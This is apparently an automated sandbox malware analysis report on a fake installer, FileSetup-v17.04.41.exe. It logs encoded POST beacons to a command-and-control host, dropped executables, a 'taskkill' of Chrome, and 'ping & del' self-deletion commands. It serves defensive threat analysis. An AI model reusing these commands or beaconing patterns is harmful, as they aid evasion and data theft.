                                                                                                                                              Date: Fri, 29 Jan 2021 09:58:21 GMT
                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Connection: keep-alive
                                                                                                                                              Set-Cookie: __cfduid=d42c56b9a586b24a78b65756275cba5401611914300; expires=Sun, 28-Feb-21 09:58:20 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                              cf-request-id: 07ef2d648e00004c61b1994000000001
                                                                                                                                              Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=5g3aT8lPdnyB9jWTP95RAHw3oVLgY0%2FefvjSXjXBUyovDBRJ9Q3Die9iIyPy%2FChjRvyWHpSsLt1UJx8R4dWOiGsKPHsfV%2BmTfbNziSsQjbO5lspcOg%3D%3D"}],"group":"cf-nel"}
                                                                                                                                              NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 6192181a78384c61-AMS
                                                                                                                                              Data Raw: 63 0d 0a 36 6d 74 6e 56 58 47 68 64 31 30 7e 0d 0a
                                                                                                                                              Data Ascii: c6mtnVXGhd10~
                                                                                                                                              Jan 29, 2021 10:58:21.875001907 CET553INData Raw: 30 0d 0a 0d 0a
                                                                                                                                              Data Ascii: 0
                                                                                                                                              Jan 29, 2021 10:58:38.902834892 CET3799OUTPOST /info_old/w HTTP/1.1
                                                                                                                                              Cache-Control: no-cache
                                                                                                                                              Connection: Keep-Alive
                                                                                                                                              Pragma: no-cache
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                              Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                              upgrade-insecure-requests: 1
                                                                                                                                              Content-Length: 81
                                                                                                                                              Host: 84cfba021a5a6662.xyz
                                                                                                                                              Jan 29, 2021 10:58:38.903032064 CET3799OUTData Raw: 69 6e 66 6f 3d 34 75 32 35 79 6d 58 49 53 42 79 6e 63 69 79 70 37 68 48 64 42 6c 4c 31 36 79 66 77 37 6f 53 30 43 43 71 79 6c 57 5a 4a 53 4e 4c 51 4a 43 59 66 76 42 67 4b 77 58 6b 67 75 2d 4e 34 42 32 77 30 66 34 32 45 52 50 5f 5a 69 33 73 7e
                                                                                                                                              Data Ascii: info=4u25ymXISBynciyp7hHdBlL16yfw7oS0CCqylWZJSNLQJCYfvBgKwXkgu-N4B2w0f42ERP_Zi3s~
                                                                                                                                              Jan 29, 2021 10:58:43.088757992 CET3832INHTTP/1.1 200 OK
                                                                                                                                              Date: Fri, 29 Jan 2021 09:58:43 GMT
                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Connection: keep-alive
                                                                                                                                              Set-Cookie: __cfduid=d1aaaf676400195897aaa736e68af83f21611914318; expires=Sun, 28-Feb-21 09:58:38 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                              cf-request-id: 07ef2dac5a00004c6173a71000000001
                                                                                                                                              Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=QrxBTgh5VEY%2FyGwRm8fpiyDQ81F2cxVikTSbfZfsykDUviDGGgLteM%2F8HUETV05NxuSf1nF8aNR0NFZKJ4Ga7NlJMW4%2B7imeiHhsjOJaek5leRucVw%3D%3D"}],"group":"cf-nel"}
                                                                                                                                              NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 6192188d5b224c61-AMS
                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                              Data Ascii: 0


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                              2192.168.2.349731104.21.23.1680C:\Users\user\Desktop\FileSetup-v17.04.41.exe
                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                              Jan 29, 2021 10:57:54.991064072 CET165OUTPOST /info_old/w HTTP/1.1
                                                                                                                                              Cache-Control: no-cache
                                                                                                                                              Connection: Keep-Alive
                                                                                                                                              Pragma: no-cache
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                              Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                              upgrade-insecure-requests: 1
                                                                                                                                              Content-Length: 81
                                                                                                                                              Host: 84cfba021a5a6662.xyz
                                                                                                                                              Jan 29, 2021 10:57:54.991079092 CET165OUTData Raw: 69 6e 66 6f 3d 34 75 32 35 79 6d 58 49 53 42 79 6e 63 69 79 70 37 68 48 64 42 6c 4c 31 36 79 66 77 37 6f 53 30 43 43 71 79 6c 57 5a 4a 53 4e 4c 51 4a 43 59 66 76 42 67 4b 77 59 6b 57 34 56 30 67 78 67 4b 50 55 77 46 67 67 56 54 68 63 4f 77 7e
                                                                                                                                              Data Ascii: info=4u25ymXISBynciyp7hHdBlL16yfw7oS0CCqylWZJSNLQJCYfvBgKwYkW4V0gxgKPUwFggVThcOw~
                                                                                                                                              Jan 29, 2021 10:58:01.071065903 CET177INHTTP/1.1 200 OK
                                                                                                                                              Date: Fri, 29 Jan 2021 09:58:01 GMT
                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Connection: keep-alive
                                                                                                                                              Set-Cookie: __cfduid=d659721ae455bd28df3ec85a0cc24d51b1611914275; expires=Sun, 28-Feb-21 09:57:55 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax
                                                                                                                                              vary: Accept-Encoding
                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                              cf-request-id: 07ef2d00d400000c5914242000000001
                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=TpOS8Oh%2BIfFIoHULqy0q7tns03UI6bzsBXB0xtB%2F%2BUvWonpEJjh%2BmDyel%2FTtgaQLKiog0IGDTP7DzciECfBpWQ4q2tyZ8vvCkWJ6%2Fm%2BAJE2W%2F2xwWA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                              NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 6192177ae8c90c59-AMS
                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                              Data Ascii: 0
                                                                                                                                              Jan 29, 2021 10:58:02.347929001 CET178OUTPOST /info_old/w HTTP/1.1
                                                                                                                                              Cache-Control: no-cache
                                                                                                                                              Connection: Keep-Alive
                                                                                                                                              Pragma: no-cache
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                              Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                              upgrade-insecure-requests: 1
                                                                                                                                              Content-Length: 81
                                                                                                                                              Host: 84cfba021a5a6662.xyz
                                                                                                                                              Jan 29, 2021 10:58:02.348011971 CET178OUTData Raw: 69 6e 66 6f 3d 34 75 32 35 79 6d 58 49 53 42 79 6e 63 69 79 70 37 68 48 64 42 6c 4c 31 36 79 66 77 37 6f 53 30 43 43 71 79 6c 57 5a 4a 53 4e 4c 51 4a 43 59 66 76 42 67 4b 77 59 6b 57 34 56 30 67 78 67 4b 50 46 37 75 66 38 34 70 42 66 41 73 7e
                                                                                                                                              Data Ascii: info=4u25ymXISBynciyp7hHdBlL16yfw7oS0CCqylWZJSNLQJCYfvBgKwYkW4V0gxgKPF7uf84pBfAs~
                                                                                                                                              Jan 29, 2021 10:58:06.584638119 CET275INHTTP/1.1 200 OK
                                                                                                                                              Date: Fri, 29 Jan 2021 09:58:06 GMT
                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Connection: keep-alive
                                                                                                                                              Set-Cookie: __cfduid=dde40bd026db3966b50373a262ab1e7e31611914282; expires=Sun, 28-Feb-21 09:58:02 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax
                                                                                                                                              vary: Accept-Encoding
                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                              cf-request-id: 07ef2d1d9000000c5964a2d000000001
                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=VfUJUQAXbOYJ7xeUF3m7aF41AINHGvqVnN1%2BIUEEShaZVESyVRsO3gey5j7pMkM7h83jvpm6icHicoghEgvt9K3zpai7twAWwglI5pniXECO4rLnhg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                              NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 619217a8ed820c59-AMS
                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                              Data Ascii: 0


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                              3192.168.2.349746104.21.23.1680C:\Users\user\Desktop\FileSetup-v17.04.41.exe
                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                              Jan 29, 2021 10:58:49.195518970 CET3833OUTGET /info_old/ddd HTTP/1.1
                                                                                                                                              Host: 84CFBA021A5A6662.xyz
                                                                                                                                              Accept: */*
                                                                                                                                              Jan 29, 2021 10:58:50.595266104 CET3833INHTTP/1.1 200 OK
                                                                                                                                              Date: Fri, 29 Jan 2021 09:58:50 GMT
                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Connection: keep-alive
                                                                                                                                              Set-Cookie: __cfduid=dabf74ae152e8f8c1cc86144a064149311611914329; expires=Sun, 28-Feb-21 09:58:49 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                              cf-request-id: 07ef2dd49100004c198d951000000001
                                                                                                                                              Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=sUvK9u52Uqh5fM8i2xQjCaaxXNAAXk4CsI2tr8kCKcuvvL%2BN5pOlrWkqr0nXqkSf6nODDrWpjbcJ0XWZdPGzVGCgqyW0rzbgHqx8eZfvFOrakdeBhA%3D%3D"}],"group":"cf-nel"}
                                                                                                                                              NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 619218cdb8eb4c19-AMS
                                                                                                                                              Data Raw: 63 0d 0a 34 48 41 6f 5a 6c 35 47 46 54 63 7e 0d 0a
                                                                                                                                              Data Ascii: c4HAoZl5GFTc~
                                                                                                                                              Jan 29, 2021 10:58:50.595309019 CET3834INData Raw: 30 0d 0a 0d 0a
                                                                                                                                              Data Ascii: 0


                                                                                                                                              Code Manipulations

                                                                                                                                              Statistics

                                                                                                                                              CPU Usage

                                                                                                                                              Click to jump to process

                                                                                                                                              Memory Usage

                                                                                                                                              Click to jump to process

                                                                                                                                              High Level Behavior Distribution

                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                              Behavior

                                                                                                                                              Click to jump to process

                                                                                                                                              System Behavior

                                                                                                                                              Analysis Process: FileSetup-v17.04.41.exe PID: 5292 Parent PID: 5612

                                                                                                                                              General

                                                                                                                                              Start time:10:57:34
                                                                                                                                              Start date:29/01/2021
                                                                                                                                              Path:C:\Users\user\Desktop\FileSetup-v17.04.41.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:'C:\Users\user\Desktop\FileSetup-v17.04.41.exe'
                                                                                                                                              Imagebase:0x400000
                                                                                                                                              File size:4592400 bytes
                                                                                                                                              MD5 hash:B7234E4A9AAAACEFA890535F8117C8FC
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Yara matches:
                                                                                                                                              • Rule: Ping_Command_in_EXE, Description: Detects an suspicious ping command execution in an executable, Source: 00000001.00000002.261933148.00000000028E0000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                              Reputation:low

                                                                                                                                              Chronological Activities

                                                                                                                                              Analysis Process: msiexec.exe PID: 3488 Parent PID: 5292

                                                                                                                                              General

                                                                                                                                              Start time:10:57:38
                                                                                                                                              Start date:29/01/2021
                                                                                                                                              Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi'
                                                                                                                                              Imagebase:0xc0000
                                                                                                                                              File size:59904 bytes
                                                                                                                                              MD5 hash:12C17B5A5C2A7B97342C362CA467E9A2
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high

                                                                                                                                              Chronological Activities

                                                                                                                                              Analysis Process: msiexec.exe PID: 6028 Parent PID: 2224

                                                                                                                                              General

                                                                                                                                              Start time:10:57:40
                                                                                                                                              Start date:29/01/2021
                                                                                                                                              Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding E90BF9A81DF75408BCAEC738866B933F C
                                                                                                                                              Imagebase:0xc0000
                                                                                                                                              File size:59904 bytes
                                                                                                                                              MD5 hash:12C17B5A5C2A7B97342C362CA467E9A2
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high

                                                                                                                                              Chronological Activities

                                                                                                                                              Analysis Process: 6852B33702F6B3BD.exe PID: 2124 Parent PID: 5292

                                                                                                                                              General

                                                                                                                                              Start time:10:57:44
                                                                                                                                              Start date:29/01/2021
                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe 0011 installp3
                                                                                                                                              Imagebase:0x400000
                                                                                                                                              File size:4592400 bytes
                                                                                                                                              MD5 hash:B7234E4A9AAAACEFA890535F8117C8FC
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Yara matches:
                                                                                                                                              • Rule: Ping_Command_in_EXE, Description: Detects an suspicious ping command execution in an executable, Source: 00000004.00000002.385937201.00000000027D0000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                              Antivirus matches:
                                                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                                                              • Detection: 48%, ReversingLabs
                                                                                                                                              Reputation:low

                                                                                                                                              Chronological Activities

                                                                                                                                              Analysis Process: 6852B33702F6B3BD.exe PID: 4640 Parent PID: 5292

                                                                                                                                              General

                                                                                                                                              Start time:10:57:45
                                                                                                                                              Start date:29/01/2021
                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe 200 installp3
                                                                                                                                              Imagebase:0x400000
                                                                                                                                              File size:4592400 bytes
                                                                                                                                              MD5 hash:B7234E4A9AAAACEFA890535F8117C8FC
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Yara matches:
                                                                                                                                              • Rule: Ping_Command_in_EXE, Description: Detects an suspicious ping command execution in an executable, Source: 00000005.00000002.290296269.0000000002810000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                              Reputation:low

                                                                                                                                              Chronological Activities

                                                                                                                                              Analysis Process: cmd.exe PID: 5384 Parent PID: 5292

                                                                                                                                              General

                                                                                                                                              Start time:10:57:50
                                                                                                                                              Start date:29/01/2021
                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\Desktop\FileSetup-v17.04.41.exe'
                                                                                                                                              Imagebase:0x9e0000
                                                                                                                                              File size:232960 bytes
                                                                                                                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high

                                                                                                                                              Chronological Activities

                                                                                                                                              Analysis Process: conhost.exe PID: 5404 Parent PID: 5384

                                                                                                                                              General

                                                                                                                                              Start time:10:57:52
                                                                                                                                              Start date:29/01/2021
                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                              Imagebase:0x7ff6b2800000
                                                                                                                                              File size:625664 bytes
                                                                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high

                                                                                                                                              Chronological Activities

                                                                                                                                              Analysis Process: PING.EXE PID: 4920 Parent PID: 5384

                                                                                                                                              General

                                                                                                                                              Start time:10:57:53
                                                                                                                                              Start date:29/01/2021
                                                                                                                                              Path:C:\Windows\SysWOW64\PING.EXE
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:ping 127.0.0.1 -n 3
                                                                                                                                              Imagebase:0x940000
                                                                                                                                              File size:18944 bytes
                                                                                                                                              MD5 hash:70C24A306F768936563ABDADB9CA9108
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:moderate

                                                                                                                                              Chronological Activities

                                                                                                                                              Analysis Process: 1611946678493.exe PID: 5404 Parent PID: 2124

                                                                                                                                              General

                                                                                                                                              Start time:10:57:58
                                                                                                                                              Start date:29/01/2021
                                                                                                                                              Path:C:\Users\user\AppData\Roaming\1611946678493.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:'C:\Users\user\AppData\Roaming\1611946678493.exe' /sjson 'C:\Users\user\AppData\Roaming\1611946678493.txt'
                                                                                                                                              Imagebase:0x400000
                                                                                                                                              File size:103632 bytes
                                                                                                                                              MD5 hash:EF6F72358CB02551CAEBE720FBC55F95
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:low

                                                                                                                                              Chronological Activities

                                                                                                                                              Analysis Process: cmd.exe PID: 720 Parent PID: 4640

                                                                                                                                              General

                                                                                                                                              Start time:10:58:00
                                                                                                                                              Start date:29/01/2021
                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                              Imagebase:0xb90000
                                                                                                                                              File size:232960 bytes
                                                                                                                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high

                                                                                                                                              Chronological Activities

                                                                                                                                              Analysis Process: conhost.exe PID: 3840 Parent PID: 720

                                                                                                                                              General

                                                                                                                                              Start time:10:58:01
                                                                                                                                              Start date:29/01/2021
                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                              Imagebase:0x7ff6b2800000
                                                                                                                                              File size:625664 bytes
                                                                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high

                                                                                                                                              Chronological Activities

                                                                                                                                              Analysis Process: taskkill.exe PID: 6176 Parent PID: 720

                                                                                                                                              General

                                                                                                                                              Start time:10:58:01
                                                                                                                                              Start date:29/01/2021
                                                                                                                                              Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:taskkill /f /im chrome.exe
                                                                                                                                              Imagebase:0x10d0000
                                                                                                                                              File size:74752 bytes
                                                                                                                                              MD5 hash:15E2E0ACD891510C6268CB8899F2A1A1
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                              Chronological Activities

                                                                                                                                              Analysis Process: cmd.exe PID: 6568 Parent PID: 4640

                                                                                                                                              General

                                                                                                                                              Start time:10:58:06
                                                                                                                                              Start date:29/01/2021
                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe'
                                                                                                                                              Imagebase:0x11c0000
                                                                                                                                              File size:232960 bytes
                                                                                                                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                              Chronological Activities

                                                                                                                                              Analysis Process: conhost.exe PID: 6576 Parent PID: 6568

                                                                                                                                              General

                                                                                                                                              Start time:10:58:06
                                                                                                                                              Start date:29/01/2021
                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                              Imagebase:0x7ff6b2800000
                                                                                                                                              File size:625664 bytes
                                                                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                              Chronological Activities

                                                                                                                                              Analysis Process: PING.EXE PID: 6636 Parent PID: 6568

                                                                                                                                              General

                                                                                                                                              Start time:10:58:07
                                                                                                                                              Start date:29/01/2021
                                                                                                                                              Path:C:\Windows\SysWOW64\PING.EXE
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:ping 127.0.0.1 -n 3
                                                                                                                                              Imagebase:0x3b0000
                                                                                                                                              File size:18944 bytes
                                                                                                                                              MD5 hash:70C24A306F768936563ABDADB9CA9108
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                              Chronological Activities

                                                                                                                                              Analysis Process: ThunderFW.exe PID: 1036 Parent PID: 2124

                                                                                                                                              General

                                                                                                                                              Start time:10:58:43
                                                                                                                                              Start date:29/01/2021
                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe'
                                                                                                                                              Imagebase:0xbf0000
                                                                                                                                              File size:73160 bytes
                                                                                                                                              MD5 hash:F0372FF8A6148498B19E04203DBB9E69
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Antivirus matches:
                                                                                                                                              • Detection: 0%, Metadefender, Browse
                                                                                                                                              • Detection: 2%, ReversingLabs

                                                                                                                                              Chronological Activities

                                                                                                                                              Analysis Process: cmd.exe PID: 3688 Parent PID: 2124

                                                                                                                                              General

                                                                                                                                              Start time:10:58:51
                                                                                                                                              Start date:29/01/2021
                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe'
                                                                                                                                              Imagebase:0x11c0000
                                                                                                                                              File size:232960 bytes
                                                                                                                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                              Chronological Activities

                                                                                                                                              Analysis Process: conhost.exe PID: 6580 Parent PID: 3688

                                                                                                                                              General

                                                                                                                                              Start time:10:58:51
                                                                                                                                              Start date:29/01/2021
                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                              Imagebase:0x7ff6b2800000
                                                                                                                                              File size:625664 bytes
                                                                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                              Chronological Activities

                                                                                                                                              Analysis Process: PING.EXE PID: 5240 Parent PID: 3688

                                                                                                                                              General

                                                                                                                                              Start time:10:58:51
                                                                                                                                              Start date:29/01/2021
                                                                                                                                              Path:C:\Windows\SysWOW64\PING.EXE
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:ping 127.0.0.1 -n 3
                                                                                                                                              Imagebase:0x3b0000
                                                                                                                                              File size:18944 bytes
                                                                                                                                              MD5 hash:70C24A306F768936563ABDADB9CA9108
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language

                                                                                                                                              Chronological Activities

                                                                                                                                              Disassembly

                                                                                                                                              Code Analysis

                                                                                                                                              Reset < >

                                                                                                                                                Analysis Process: FileSetup-v17.04.41.exe PID: 5292 Parent PID: 5612 FileSetup-v17.04.41.exeCOMMON

                                                                                                                                                Executed Functions

                                                                                                                                                Function 00495C87, Relevance: 35.2, APIs: 5, Strings: 15, Instructions: 166filememoryCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • CreateFileA.KERNELBASE(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 00495E7B
                                                                                                                                                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 00495EB2
                                                                                                                                                • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 00495EEB
                                                                                                                                                • FindCloseChangeNotification.KERNELBASE(?), ref: 00495F04
                                                                                                                                                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 00495F41
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AllocFileVirtual$ChangeCloseCreateFindNotificationRead
                                                                                                                                                • String ID: CloseHandle$CreateFileA$ExitProcess$GetFileSize$GetLastError$GetModuleFileNameA$ReadFile$VirtualAlloc$VirtualProtect$c$e$o$r$s$s
                                                                                                                                                • API String ID: 1686837766-3752642194
